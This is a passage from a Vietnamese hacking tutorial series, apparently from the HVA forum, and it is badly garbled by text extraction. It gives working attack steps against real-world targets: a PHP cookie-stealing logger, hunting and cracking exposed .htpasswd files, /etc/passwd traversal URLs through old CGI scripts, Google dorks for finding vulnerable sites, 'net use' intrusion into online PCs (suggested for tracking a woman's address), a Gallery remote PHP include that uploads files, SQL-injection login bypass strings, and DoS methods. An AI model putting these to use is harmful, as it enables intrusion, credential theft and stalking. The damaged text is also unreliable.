+ Tn: do ngi lp trnh web site chn+ Domain: l tn min t serverm cookie c to v gi i+ ng dn: thng tin v ng dn web site m bn ang xem+ Ngy ht hn: l thi im m cookie ht hiu lc .+ Bo mt: Nu gi tr ny c thit lp bn trong cookie, thng tin s c m ho trongqu trnh truyn gia serverv browser.+ Cc gi tr khc: l nhng d liu c trng c web serverlu tr nhn dng v saucc gi tr ny ko cha cc khong trng, du chm, phy v b gii hn trong khong 4k.

( Ti liu ca Viethacker.net )

21 . ) K thut ly cp cookie ca nn nhn :

_ Trc ht , cc bn hy m notepad ri chp on m sau vo notepad :

CODE


12/41

}// get current date$now = date(``Y-m-d H:i:s``);// init$myData = ``[-----$now-----]`` . LINE;// get

$myData .= getvars($HTTP_GET_VARS, ````);// file$file = $REMOTE_ADDR . ``.txt``;$mode = ``r+``;if (!file_exists($file))$mode = ``w+``;$fp = fopen ($file, $mode);fseek($fp, 0, SEEK_END);fwrite($fp, $myData);fclose($fp);? >

hoc

CODE


13/41

CODE`)\">

hoc:

[CODEimg]javascript: Document.write(``)\">

_ Bn c th tm nhng trang web thc hnh th cch trong VD ny bng cch vogoogle.com tm nhng forum b li ny bng t kho ``Powered by .. forum vi nhngforum sau : ikonboard, Ultimate Bulletin Board , vBulletin Board, Snitz . Nu cc bn maymn cc bn c th tm thy nhng forum cha fix li ny m thc hnh , ai tm c th chias vi mi ngi nh .

_ Cn nhiu on m n cp cookie cng hay lm , cc bn hy t mnh tm thm .

22 . ) Cch ngt mt khu bo v Website :

_ Khi cc bn ti tm kim thng tin trn mt trang Web no , c mt s ch trn trangWeb khi bn vo s b chn li v s xut hin mt box yu cu nhp mt khu , y chnhl khu vc ring t ct du nhng thng tin mt ch dnh cho s ngi hoc mt nhm ngino ( Ni ct ngh hack ca viethacker.net m bo e-chip ni ti chng hn ) . Khi taclick vo ci link th ( thng thng ) n s gi ti .htpasswd v .htaccess nm cngtrong th mc bo v trang Web . Ti sao phi dng du chm trc trong tn file`.htaccess`? Cc file c tn bt u l mt du chm `.` s c cc web servers xem nh lcc file cu hnh. Cc file ny s b n i (hidden) khi bn xem qua th mc c bo v

bng file .htaccess .Hai h s ny c nhim v iu khin s truy nhp ti ci link an ton mbn mun xm nhp . Mt ci qun l mt khu v user name , mt ci qun l cng vicm ho nhng thng tin cho file kia . Khi bn nhp ng c 2 th ci link mi m ra . Bnhy nhn VD sau :

CODEGraham:F#.DG*m38d%RFWebmaster:GJA54j.3g9#$@f

Username bn c th c c ri , cn ci pass bn nhn c hiu m t g khng ? D nhin

l khng ri . bn c hiu v sao khng m bn khng th c c chng khng ? ci ny nc s can thip ca thng file .htaccess . Do khi cng trong cng th mc chng c tc ngqua li bo v ln nhau nn chng ta cng khng di g m c gng t nhp ri ***** mmt khu cht tit ( khi cha c ngh ***** mt khu trong tay . Ti cng ang nghincu c th xm nhp trc tip , nu thnh cng ti s post ln cho cc bn ) . Li l y ,chuyn g s xy ra nu ci .htpasswd nm ngoi th mc bo v c file .htaccess ? Ta schm c n d dng , bn hy xem link VD sau :

http://www.company.com/cgi-bin/pro tected/

hy kim tra xem file .htpasswd c c bo v bI .htaccess hay khng , ta nhp URL sau :

http://www.company.com/cgi-bin/pro tected/.htpasswd


14/41

Nu bn thy c cu tr lI `File not found` hoc tng t th chc chn file ny khngc bo v , bn hy tm ra n bng mt trong cc URL sau :

http://www.company.com/.htpasswdhttp://www.company.com/cgi-bin/.ht passwd

http://www.company.com/cgi-bin/pas swords/.htpasswdhttp://www.company.com/cgi-bin/pas swd/.htpasswd

nu vn khng thy th cc bn hy c tm bng cc URL khc tng t ( c th n nm ngay th mc gc y ) , cho n khi no cc bn tm thy th thi nh .Khi tm thy file ny ri , bn hy dng chng trnh ``John the ripper`` hoc ``Crackerjack``, ***** passwd ct trong . Cng vic tip theo hn cc bn bit l mnh phi lm grI , ly user name v passwd hp l t nhp vo ri xem th my c cu tm s nhng gtrong , nhng cc bn cng ng c i pass ca h hay quy h nh .Cch ny cc bn cng c th p dng ly pass ca admin v hu ht nhng thnh vintrong nhm kn u l c chc c quyn c .

23 . ) Tm hiu v CGI ?

_ CGI l t vit tt ca Common Gateway Interface , a s cc Website u ang s dngchng trnh CGI ( c gI l CGI script ) thc hin nhng cng vic cn thit 24 gihng ngy . Nhng nguyn bn CGI script thc cht l nhng chng trnh c vit v cupload ln trang Web vI nhng ngn ng ch yu l Perl , C , C++ , Vbscript trong Perlc a chung nht v s d dng trong vic vit chng trnh ,chim mt dung lng t vnht l n c th chy lin tc trong 24 gi trong ngy .

_ Thng thng , CGI script c ct trong th mc /cgi-bin/ trn trang Web nh VD sau :

http://www.company.com/cgi-bin/log in.cgi

vi nhng cng vic c th nh :+ To ra chng trnh m s ngi gh thm .+ Cho php nhng ngI khch lm nhng g v khng th lm nhng g trn Website ca

bn .+ Qun l user name v passwd ca thnh vin .+ Cung cp dch v Mail .+ Cung cp nhng trang lin kt v thc hin tin nhn qua li gia cc thnh vin .+ Cung cp nhng thng bo li chi tit .v.v..

24 . ) Cch hack Web c bn nht thng qua CGI script :

_ Li th 1 : li nph-test-cgi

+ nh tn trang Web b li vo trong trnh duyt ca bn .+ nh dng sau vo cuI cng : /cgi-bin/nph-test-cgi+ Lc trn URL bn s nhn ging nh th ny :

http://www.servername.com/cgi-bin/ nph-test-cgi

+ Nu thnh cng bn s thy cc th mc c ct bn trong . xem th mc no bn nh

tip :

CODE


15/41

? /*

+ file cha passwd thng c ct trong th mc /etc , bn hy nh trn URL dng sau :

http://www.servername.com/cgi-bin/ nph-test-cgi?/etc/*

_ Li th 2 : li php.cgi

+ Tng t trn bn ch cn nh trn URL dng sau ly pass :

http://www.servername.com/cgi-bin/ php.cgi?/etc/passwd

Quan trng l y l nhng li c nn vic tm cc trang Web cc bn thc hnh rt kh, cc bn hy vo trang google.com ri nh t kho :

/cgi-bin/php.cgi?/etc/passwd]hoc cgi-bin/nph-test-cgi?/etc

sau cc bn hy tm trn xem th trang no cha fix li thc hnh nh .

25 . ) K thut xm nhp my tnh ang online :

_ Xm nhp my tnh ang online l mt k thut va d lI va kh . Bn c th ni d khibn s dng cng c ENT 3 nhng bn s gp vn khi dng n l tc s dng trn myca nn nhn s b chm i mt cch ng k v nhng my h khng share th khng thxm nhp c, do nu h tt my l mnh s b cng cc khi cha kp chm account , cmt cch m thm hn , t lm gim tc hn v c th xm nhp khi nn nhn khng sharel dng chng trnh DOS tn cng . Ok , ta s bt u :

_ Dng chng trnh scan IP nh ENT 3 scan IP mc tiu ._ Vo Start == > Run g lnh cmd ._ Trong ca s DOS hy nh lnh net view

CODE+ VD : c:\net view 203.162.30.xx

_ Bn hy nhn kt qu , nu n c share th d qu , bn ch cn nh tip lnh

net use :

+ VD : c:\net use E : 203.162.30.xxC

_ Nu khi kt ni my nn nhn m c yu cu s dng Passwd th bn hy download chngtrnh d passwd v s dng ( theo ti bn hy load chng trnh pqwak2 p dng cho vicd passwd trn my s dng HH Win98 hoc Winme v chng trnh xIntruder dng choWin NT ) . Ch l v cch s dng th hai chng trnh tng t nhau , dng u ta nh IPca nn nhn , dng th hai ta nh tn a share ca nn nhn nhng i vi xIntruder tach chnh Delay ca n cho hp l , trong mng LAN th Delay ca n l 100 cn trongmng Internet l trn dI 5000 .

_ Nu my ca nn nhn khng c share th ta nh lnh :

net use : c$ (hoc d$)``administrator``


16/41

+ VD : net use E : 203.162.30.xxC$``administrator``

Kiu chia s bng c$ l mc nh i vi tt c cc my USER l ``administrator`` ._ Chng ta c th p dng cch ny t nhp vo my ca c bn m mnh thm thngtrm nh tm nhng d liu lin quan n a ch ca c nng ( vi iu kin l c ta angdng my nh v bn may mn khi tm c a ch ) . Bn ch cn chat Y!Mass ri vo

DOS nh lnh :c:\netstat n

Khi dng cch ny bn hy tt ht cc ca s khc ch khung chat Y!Mass vi c ta thi ,n s gip bn d dng hn trong vic xc nh a ch IP ca c ta . Sau bn dng cchxm nhp m ti ni trn .( C l anh chng tykhung ca chng ta hi xa khi tn tnh c

bn xa qua mng cng dng cch ny t nhp v tm hiu a ch ca c ta y m ,hi`hi` . )Bn s thnh cng nu my ca nn nhn khng ci firewall hay proxy .

================================================== = =

Nhiu bn c yu cu ti a ra a ch chnh xc cho cc bn thc tp , nhng ti khng tha ra c v rt kinh nghim nhng bi hng dn c a ch chnh xc , khi cc bn thchnh xong ot c quyn admin c bn xo ci database ca h . Nh vy HVA s mangting l ni bt ngun cho s ph hoi trn mng . mong cc bn thng cm , nu c th th tich nu nhng cch thc cc bn tm nhng da ch b li ch khng a ra a ch cth no .

================================================== = =

phn 4 ti s cp n k thut chng xm nhp vo my tnh ca mnh khi bn online ,tm hiu s cc bc khi ta quyt nh hack mt trang Web , k thut tm ra li trang Web thc hnh , k thut hack Web thng qua li Gallery.v.v.

GOOKLUCK!!!!!!!!!

( Ht phn 3 )AnhdendayHVA

Nhng hiu bit c bn nht tr thnh Hacker - Phn 426 . ) Tm hiu v RPC (Remote Procedure Call) :

_ Windows NT cung cp kh nng s dng RPC thc thi cc ng dng phn tn .Microsoft RPC bao gm cc th vin v cc dch v cho php cc ng dng phn tn hotng c trong mi trng Windows NT. Cc ng dng phn tn chnh bao gm nhiu tintrnh thc thi vi nhim v xc nh no . Cc tin trnh ny c th chy trn mt hay nhiumy tnh.

_Microsoft RPC s dng name service provider nh v Servers trn mng. Microsoft RPCname service provider phi i lin vi Microsoft RPC name service interface (NIS). NIS bao

bao gm cc hm API cho php truy cp nhiu thc th trong cng mt name service database(name service database cha cc thc th, nhm cc thc th, lch s cc thc th trnServer).
http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=5&script=showthread&forumid=32


17/41

Khi ci t Windows NT, Microsoft Locator t ng c chn nh l name service provider.N l name service provider ti u nht trn mi trng mng Windows NT.

27 . ) K thut n gin chng li s xm nhp tri php khi ang online thng quaRPC (Remote Procedure Call) :

_ Nu bn nghi ng my ca mnh ang c ngi xm nhp hoc b admin remote desktoptheo di , bn ch cn tt chc nng remote procedure call th hin ti khng c chng trnhno c th remote desktop theo di bn c . N cn chng c hu ht tools xm nhpvo my ( v a s cc tools vit connect da trn remote procedure call ( over tcp/ip )).Cctrojan a s cng da vo giao thc ny.

Cch tt: Bn vo service /remote procedure call( click chut phi ) chn starup typt/disablehoc manual/ apply.

y l cch chng rt hu hiu vi my PC , nu thm vi cch tt file sharing th rt kh bhack ) ,nhng trong mng LAN bn cng phin phc vi n khng t v bn s khng chyc cc chng trnh c lin quan n thit b ny . Ty theo cch thc bn lm vic m bnc cch chn la cho hp l . Theo ti th nu dng trong mng LAN bn hy ci mt firewalll chc chn tng i an ton ri .

( Da theo bi vit ca huynh i nh c khoai khoaimi admin ca HVA )

28 . ) Nhng bc hack mt trang web hin nay :

_ Theo lit k ca sch Hacking Exposed 3 th hack mt trang Web thng thng ta thchin nhng bc sau :+ FootPrinting : ( In du chn )y l cch m hacker lm khi mun ly mt lng thng tin ti a v my ch/doanhnghip/ngi dng. N bao gm chi tit v a ch IP, Whois, DNS ..v.v i khi l nhngthong tin chnh thc c lien quan n mc tiu. Nhiu khi n gin hacker ch cn s dngcc cng c tm kim trn mng tm nhng thong tin .+ Scanning : ( Qut thm d )Khi c nhng thng tin ri, th tip n l nh gi v nh danh nhng nhng dch vm mc tiu c. Vic ny bao gm qut cng, xc nh h iu hnh, .v.v.. Cc cng c cs dng y nh nmap, WS pingPro, siphon, fscam v cn nhiu cng c khc na.+ Enumeration : ( lit k tm l hng )Bc th ba l tm kim nhng ti nguyn c bo v km, hoch ti khon ngi dng mc th s dng xm nhp. N bao gm cc mt khu mc nh, cc script v dch v mcnh. Rt nhiu ngi qun tr mng khng bit n hoc khng sa i li cc gi tr ny.

+ Gaining Access: ( Tm cch xm nhp )By gi k xm nhp s tm cch truy cp vo mng bng nhng thng tin c c ba bctrn. Phng php c s dng y c th l tn cng vo li trn b m, ly v gii mfile password, hay th thin nht l brute force (kim tra tt c cc trng hp) password. Cccng c thng c s dng bc ny l NAT, podium, hoc L0pht.+ Escalating Privileges : ( Leo thang c quyn )V d trong trng hp hacker xm nhp c vo mng vi ti khon guest, th h s tmcch kim sot ton b h thng. Hacker s tm cch ***** password ca admin, hoc sdng l hng leo thang c quyn. John v Riper l hai chng trnh crack password rthay c s dng.+ Pilfering : ( Dng khi cc file cha pass b s h )

Thm mt ln na cc my tm kim li c s dng tm cc phng php truy cp vomng. Nhng file text cha password hay cc c ch khng an ton khc c th l mi ngoncho hacker.


18/41

+ Covering Tracks : ( Xo du vt )Sau khi c nhng thng tin cn thit, hacker tm cch xo du vt, xo cc file log ca hiu hnh lm cho ngi qun l khng nhn ra h thng b xm nhp hoc c bit cngkhng tm ra k xm nhp l ai.+ Creating ``Back Doors`` : ( To ca sau chun b cho ln xm nhp tip theo c d dnghn )

Hacker li ``Back Doors``, tc l mt c ch cho php hacker truy nhp tr li bng conng b mt khng phi tn nhiu cng sc, bng vic ci t Trojan hay to user mi (ivi t chc c nhiu user). Cng c y l cc loi Trojan, keylog+ Denial of Service (DoS) : ( Tn cng kiu t chi dch v )

Nu khng thnh cng trong vic xm nhp, th DoS l phng tin cui cng tn cng hthng. Nu h thng khng c cu hnh ng cch, n s b ph v v cho php hacker truycp. Hoc trong trng hp khc th DoS s lm cho h thng khng hot ng c na.Cc cng c hay c s dng tn cng DoS l trin00, Pong Of Death, teardrop, cc loinuker, flooder . Cch ny rt li hi , v vn cn s dng ph bin hin nay .

_ Tu theo hiu bit v trnh ca mnh m mt hacker b qua bc no . Khng nht thitphI lm theo tun t . Cc bn hy nh n cu bit ngi bit ta trm trn trm thng .

( Ti liu ca HVA v hackervn.net )

29 . ) Cch tm cc Website b li :

_ Chc cc bn bit n cc trang Web chuyn dng tm kim thng tin trn mng ch ?Nhng cc bn chc cng khng ng l ta c th dng nhng trang tm nhng trangWeb b li ( Ti vn thng dng trang google.com v khuyn cc bn cng nn dng trangny v n rt mnh v hiu qu ) .

_ Cc bn quan tm n li trang Web v mun tm chng bn ch cn vo google.com vnh on li vo sau allinurl : . VD ta c on m li trang Web sau :

cgi-bin/php.cgi?/etc/passwd

cc bn s nh :

allinurl:cgi-bin/php.cgi?/etc/passwd

N s lit k ra nhng trang Web ang b li ny cho cc bn , cc bn hy nhn xung dicng ca mi mu lit k ( dng a ch mu xanh l cy ) nu dng no vit y chang t khomnh nhp vo th trang hoc ang b li .Cc bn c xm nhp vo c hay khng thcng cn tu vo trang Web fix li ny hay cha na .

_ Cc bn quan tm n li forum , cc bn mun tm forum dng ny thc tp , ch cn

nhp t kho

powered by

VD sau l tm forum dng Snitz 2000 :

powered by Snitz 2000

_ Tuy nhin , vic tm ra ng forum hoc trang Web b li theo cch c xc sut khngcao , bn hy quan tm n on string c bit trong URL c trng cho tng kiu trang Webhoc forum ( ci ny rt quan trng , cc bn hy t mnh tm hiu thm nh ) . VD tm vi

li Hosting Controller th ta s c on c trng sau

``/admin hay /advadmin hay /hosting``
http://www.ddth.com/autolink.php?id=4&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=4&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=4&script=showthread&forumid=32http://www.ddth.com/autolink.php?id=4&script=showthread&forumid=32


19/41

ta hy nh t kho :

allinurl:/advadminhoc allinurl:/adminhoc allinurl:/hosting

N s lit k ra cc trang Web c URL dng :

http://tentrangweb.com/advadminhoc http://tentrangweb.com/adminhoc http://tentrangweb.com/hosting

VD vi forum UBB c on c trng

``cgi-bin/ultimatebb.cgi?``

Ta cng tm tng t nh trn .Ch cn bn bit cch tm nh vy ri th sau ny ch cn theo di thng tin cp nht bn trangLi bo mt ca HVA do bn LeonHart post hng ngy cc bn s hiu c ngha cachng v t mnh kim tra .

30 . ) K thut hack Web thng qua li Gallery ( mt dng ca li php code inject ):

_ Gallery l mt cng c cho php to mt gallery nh trn web c vit bng PHP , lidng s h ny ta c th li dng vit thm vo mt m PHP cho php ta upload , chnh l mc ch chnh ca ta .

_ Trc ht bn hy ng k mt hostmin ph , tt nht l bn ng k brinkster.com chod . Sau bn m notepad v to file PHP vi on m sau :

CODE


20/41

init.php ny ln sm v ta s cn s dng n nhng vi on m khc , bn qun upload fileny ln l tiu )

Bn hy to thm mt file PHP vi m sau :

CODE


21/41

+ Bn hy loi b trng hp cc th mc m c du . hoc .. v y l th mc gc hocl th mc o ( N thng c xp trn cng ca cc hng kt qu ) .+ Bn cng loI b nhng hng c ch cui cng c gn ui ( VD nh config.php ,check.inc .v.v ) v y l nhng file ch khng phi l th mc .+ Cn li l nhng th mc c th upload nhng ti khuyn bn nn chn nhng hng chatn th mc m c cha s ln hn 1 ( Bn c th xc nh c chng bng cch nhn ct

th 2 t tri sang ) , v nh vy va chc chn y l th mc khng phi th mc o , valm cho admin ca trang Web kh pht hin khi ta ci file ca ta vo . Ti VD ti pht hinra th mc loveyou c cha 12 file c th cho ta upload , nh vy ng dn chnh thc mta upload ln s l :

/home/abc/xyz/Gallery/loveyou

By gi bn hy vo account host ca bn, sa ni dung file init.php ging nh m ca fileupload.php, nhng sa li *PATH* thnh /home/abc/xyz/gallery/loveyou/ . ng thi cngchun b mt file upload.php trn my ca bn vi *PATH* l ( 2 du ngoc kp ).By gi l ta c th upload file upload.php ln trang Web ca nn nhn c ri , bn hynhp a ch sau trn trnh duyt Web ca bn :

http:// trang Web ca nn nhn > /gallery./captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/ /

Bn s thy xut hin tip mt khung hnh ch nht v bn cnh l c 2 nt lnh , mt l ntbrown , mt l nt upload . Nt brown bn dng dn n a ch file upload.php bn chun b trn my ca bn , nt upload khi bn nhn vo th n s upload fileupload.php ln trang Web ca nn nhn . Ok , by gi coi nh bn hon thnh chngng hack Web ri . T by gi bn hy vn dng tn cng i th nh ly database ,

password ( lm tng t nh cc bi hng dn hack trc ) , nhng cc bn ch nn thc tpch ng xo database hay ph Web ca h. Nu l mt hacker chn chnh cc bn ch cnupload ln trang Web dng ch : Hack by .. l ri .Cng nh nhng ln trc , cc bn c thnh cng hay khng cng tu thuc vo s may mnv kin tr nghin cu vn dng kin thc ca cc bn .

( Da theo hng dn hack ca huynh vnofear viethacker.net )

GOODLUCK!!!!!!!!!!!!

( Ht phn 4 )Anhdenday

HVA


31 . ) Gi tin TCP/IP l g?

TCP/IP vit tt cho Transmission Control Protocol and Internet Protocol, mt Gi tin TCP/IPl mt khi d liu c nn, sau km thm mt header v gi n mt my tnh khc.y l cch thc truyn tin ca internet, bng cch gi cc gi tin. Phn header trong mt gitin cha a ch IP ca ngi gi gi tin. Bn c th vit li mt gi tin v lm cho n trongging nh n t mt ngi khc!! Bn c th dng cch ny tm cch truy nhp vo rt

nhiu h thng m khng b bt. Bn s phi chy trn Linux hoc c mt chng trnh chophp bn lm iu ny.


22/41

32 . ) Linux l gi`:

_Ni theo ngha gc, Linux l nhn ( kernel ) ca HH. Nhn l 1 phn mm m trch chcv lin lc gia cc chng trnh ng dng my tnh v phn cng. Cung cp cc chng nngnh: qun l file, qun l b nh o, cc thit b nhp xut nhng cng, mn hnh, bn

phm, .... Nhng Nhn Linux cha phi l 1 HH, v th nn Nhn Linux cn phi lin kt vinhng chng trnh ng dng c vit bi t chc GNU to ln 1 HH hon chnh: HHLinux. y cng l l do ti sao chng ta thy GNU/Linux khi c nhc n Linux.Tip theo, 1 cng ty hay 1 t chc ng ra ng gi cc sn phm ny ( Nhn v Chngtrnh ng dng ) sau sa cha mt s cu hnh mang c trng ca cng ty/ t chcmnh v lm thm phn ci t ( Installation Process ) cho b Linux , chng ta c :Distribution. Cc Distribution khc nhau s lng v loi Software c ng gi cng nhqu trnh ci t, v cc phin bn ca Nhn. 1 s Distribution ln hin nay ca Linux l :Debian, Redhat, Mandrake, SlackWare, Suse .

33 . ) Cc lnh cn bn cn bit khi s dng hoc xm nhp vo h thng Linux :

_ Lnh `` man`` : Khi bn mun bit cch s dng lnh no th c th dng ti lnh nay :Cu trc lnh : $ man .V d : $ man man

_ Lnh `` uname ``: cho ta bit cc thng tin c bn v h thngV d : $uname -a ; n s a ra thng tin sau :

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ Lnh id : xem uid/gid hin ti ( xem nhm v tn hin ti )

_ Lnh w : xem cc user ang login v action ca h trn h thng .V D : $w n s a ra thng tin sau :

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ Lnh ps: xem thng tin cc process trn h thngV d : $ps axuw

_ Lnh cd : bn mun di chuyn n th mc no . phi nh n lnh ny .V du : $ cd /usr/bin ---- > n s a bn n th mc bin

_ Lnh mkdir : to 1 th mc .V d : $ mkdir /home/convit --- > n s to 1 th mc convit trong /home

_ Lnh rmdir : g b th mc

V d : $ rmdir /home/conga ---- > n s g b th mc conga trong /home ._ Lnh ls: lit k ni dung th mcV d : $ls -laR /

_ Lnh printf: in d liu c nh dng, ging nh s dng printf() ca C++ .V d : $printf %s ``\x41\x41\x41\x41``

_ Lnh pwd: a ra th mc hin hnhV d : $pwd ------ > n s cho ta bit v tr hin thi ca ta u : /home/level1

_ Cc lnh : cp, mv, rm c ngha l : copy, move, delete fileV d vi lnh rm (del) : $rm -rf /var/tmp/blah ----- > n s del file blah .Lm tng t i vi cc lnh cp , mv .

_ Lnh find : tm kim file, th mc

V d : $find / -user level2_ Lnh grep: cng c tm kim, cch s dng n gin nht : grep ``something``Vidu : $ps axuw | grep ``level1``


23/41

_ Lnh Strings: in ra tt c cc k t in c trong 1 file. Dng n tm cc khai bo hnhchui trong chng trnh, hay cc gi hm h thng, c khi tm thy c password naVD: $strings /usr/bin/level1

_ Lnh strace: (linux) trace cc gi hm h thng v signal, cc k hu ch theo di flowca chng trnh, cch nhanh nht xc nh chng trnh b li on no. Trn cc hthng unix khc, tool tng ng l truss, ktrace .

V d : $strace /usr/bin/level1_ Lnh`` cat, more ``: in ni dung file ra mn hnh

$cat /etc/passwd | more -- > n s a ra ni dung file passwd mt cch nhanh nht .$more /etc/passwd ---- > N s a ra ni dung file passwd mt cch t t .

_ Lnh hexdump : in ra cc gi tr tng ng theo ascii, hex, octal, decimal ca d liu nhpvo .V d : $echo AAAA | hexdump

_ Lnh : cc, gcc, make, gdb: cc cng c bin dch v debug .V d : $gcc -o -g bof bof.cV d : $make bofV d : $gdb level1(gdb) break main(gdb) run

_ Lnh perl: mt ngn ngV d : $perl -e `print ``A``x1024` | ./bufferoverflow ( Li trn b m khi ta nh vo 1024k t )

_ Lnh ``bash`` : n lc t ng ho cc tc v ca bn bng shell script, cc mnh vlinh hot .Bn mun tm hiu v bash , xem n nh th no :$man bash

_ Lnh ls : Xem ni dung th mc ( Lit k file trong th mc ) .V D : $ ls /home ---- > s hin ton b file trong th mc Home$ ls -a ----- > hin ton b file , bao gm c file n$ ls -l ----- > a ra thng tin v cc file

_ Lnh ghi d liu u ra vo 1 file :Vd : $ ls /urs/bin > ~/convoi ------ > ghi d liu hin th thng tin ca th mc bin vo 1 fileconvoi .

34 . ) Nhng hiu bit c bn xung quanh Linux :

a . ) Mt vi th mc quan trng trn server :

_ /home : ni lu gi cc file ngi s dng ( VD : ngi ng nhp h thng c tn l convitth s c 1 th mc l /home/convit )

_ /bin : Ni x l cc lnh Unix c bn cn thit nh ls chng hn ._ /usr/bin : Ni x l cc lnh dc bit khc , cc lnh dng bi ngi s dng c bit vdng qun tr h thng .

_ /bot : Ni m kernel v cc file khc c dng khi khi ng ._ /ect : Cc file hot ng ph mng , NFS (Network File System ) Th tn ( y l ni trngyu m chng ta cn khai thc nhiu nht )

_ /var : Cc file qun tr_ /usr/lib : Cc th vin chun nh libc.a_ /usr/src : V tr ngun ca cc chng trnh .

b . ) V tr file cha passwd ca mt s phin bn khc nhau :


24/41

CODEAIX 3 /etc/security/passwd !/tcb/auth/files//A/UX 3.0s /tcb/files/auth/?/*BSD4.3-Ren /etc/master.passwd *ConvexOS 10 /etc/shadpw *ConvexOS 11 /etc/shadow *

DG/UX /etc/tcb/aa/user/ *EP/IX /etc/shadow xHP-UX /.secure/etc/passwd *IRIX 5 /etc/shadow xLinux 1.1 /etc/shadow *OSF/1 /etc/passwd[.dir|.pag] *SCO Unix #.2.x /tcb/auth/files//SunOS4.1+c2 /etc/security/passwd.adjunct ##usernameSunOS 5.0 /etc/shadowSystem V Release 4.0 /etc/shadow xSystem V Release 4.2 /etc/security/* databaseUltrix 4 /etc/auth[.dir|.pag] *UNICOS /etc/udb *

35 . ) Khai thc li ca Linux qua l hng bo mt ca WU-FTP server :

_ WU-FTP Server(c pht trin bi i Hc Washington ) l mt phn mm Server phcv FTP c dng kh ph bin trn cc h thng Unix & Linux ( tt c cc nh phn phi:Redhat, Caldera, Slackware, Suse, Mandrake....) v c Windows.... , cc hacker c th thc thicc cu lnh ca mnh t xa thng qua file globbing bng cch ghi ln file c trn h thng.

_ Tuy nhin , vic khai thc li ny khng phI l d v n phi hi nhng iu kin sau :+ Phi c account trn server .+ Phi t c Shellcode vo trong b nh Process ca Server .+ Phi gi mt lnh FTP c bit cha ng mt globbing mu c bit m khng b server

pht hin c li .+ Hacker s ghi ln mt Function, Code ti mt Shellcode, c th n s c thc thi bichnh Server FTP .

_ Ta hy phn tch VD sau v vic ghi ln file ca server FTP :

CODEftp > open localhost


25/41

26265 tty3 R 0:00 bash -c ps ax | grep ftpd(gdb) at 26256Attaching to program: /usr/sbin/wu.ftpd, process 26256


26/41

Nu khng c bn th tip vi cc login v pass sau :

CODE` or 1=1--`` or 1=1--

or 1=1--` or à`=à`` or `à``=`à`) or (à`=à

Nu thnh cng, bn c th login vo m khng cn phi bit username v password .Li ny c dnh dng n Query nn nu bn no tng hc qua c s d liu c th khaithc d dng ch bng cch nh cc lnh Query trn trnh duyt ca cc bn . Nu cc bnmun tm hiu k cng hn v li ny c th tm cc bi vit ca nhm vicky tm hiuthm .

37 . ) Mt VD v hack Web thng qua li admentor ( Mt dng ca li SQL Injection ) :

_ Trc tin bn vo google.com tm trang Web admentor bng t kho allinurl : admentor .

_ Thng thng bn s c kt qu sau :

http://www.someserver.com/admentor/admin/admin.asp

_ Bn th nhp ` or ``=` vo login v password :

CODELogin : ` or ``=`Password : ` or ``=`

_ Nu thnh cng bn s xm nhp vo Web b li vi vai tr l admin ._ Ta hy tm hiu v cch fix li ny nh :+ Lc cc k t c bit nh ` `` ~ \ bng cch chm vo javascrip on m sau :

CODEfunction RemoveBad(strTemp){

strTemp = strTemp.replace(/\ |\``|\`|\%|\;|$|$|\&|\+|\-/g,````);return strTemp;}

+ V gi n t bn trong ca asp script :

CODEvar login = var TempStr = RemoveBad(Request.QueryString(``login``));

var password = var TempStr = RemoveBad(Request.QueryString(``password``));
http://www.someserver.com/admentorhttp://www.someserver.com/admentorhttp://www.someserver.com/admentorhttp://www.someserver.com/admentorhttp://www.someserver.com/admentor


27/41

_ Vy l ta fix xong li ._ Cc bn c th p dng cch hack ny cho cc trang Web khc c submit d liu , cc bnhy test th xem i , cc trang Web Vit Nam mnh b nhiu lm , ti kim c kha kh

pass admin bng cch th ny ri ( nhng cng bo h fix li ) ._ C nhiu trang khi login khng phi bng ` or ``= m bng cc nick name c tht

ng k trn trang Web , ta vo link thnh vin kim nick ca mt admin test th nh.Hack vui v .

================================================== = =

phn 6 ti s cp n kiu tn cng t chi dch v ( DoS attack ) , mt kiu tn cng lihi lm cho trang Web hng mnh nh HVA ca chng ta b tt nghn ch trong thI gianngn cc admin bn i ung cafe ht m khng ai trng coi . Km theo l cc phng phptn cng DoS v ang c s dng .

GOOKLUCK!!!!!!!!!!!!!!!!!!!!

( Ht phn 5 )

AnhdendayHVA


38 . ) DoS attack l g ? ( Denial Of Services Attack )

_ DoS attack ( dch l tn cng t chi dch v ) l kiu tn cng rt li hi , vi loi tn cngny , bn ch cn mt my tnh kt ni Internet l c th thc hin vic tn cng c mytnh ca I phng . thc cht ca DoS attack l hacker s chim dng mt lng ln tinguyn trn server( ti nguyn c th l bng thng, b nh, cpu, a cng, ... ) lm choserverkhng th no p ng cc yu cu t cc my ca ngui khc ( my ca nhng ngidng bnh thng ) v serverc th nhanh chng b ngng hot ng, crash hoc reboot .

39 . ) Cc loi DoS attack hin ang c bit n v s dng :

a . ) Winnuke :

_DoS attack loi ny ch c th p dng cho cc my tnh ang chy Windows9x . Hacker sgi cc gi tin vi d liu ``Out of Band`` n cng 139 ca my tnh ch.( Cng 139 chnhl cng NetBIOS, cng ny ch chp nhn cc gi tin c c Out of Band c bt ) . Khi mytnh ca victim nhn c gi tin ny, mt mn hnh xanh bo li s c hin th ln vi nnnhn do chng trnh ca Windows nhn c cc gi tin ny nhng n li khng bit phnng vi cc d liu Out Of Band nh th no dn n h thng s b crash .

b . ) Ping of Death :

_ kiu DoS attack ny , ta ch cn gi mt gi d liu c kch thc ln thng qua lnhping n my ch th h thng ca h s b treo ._ VD : ping l 65000
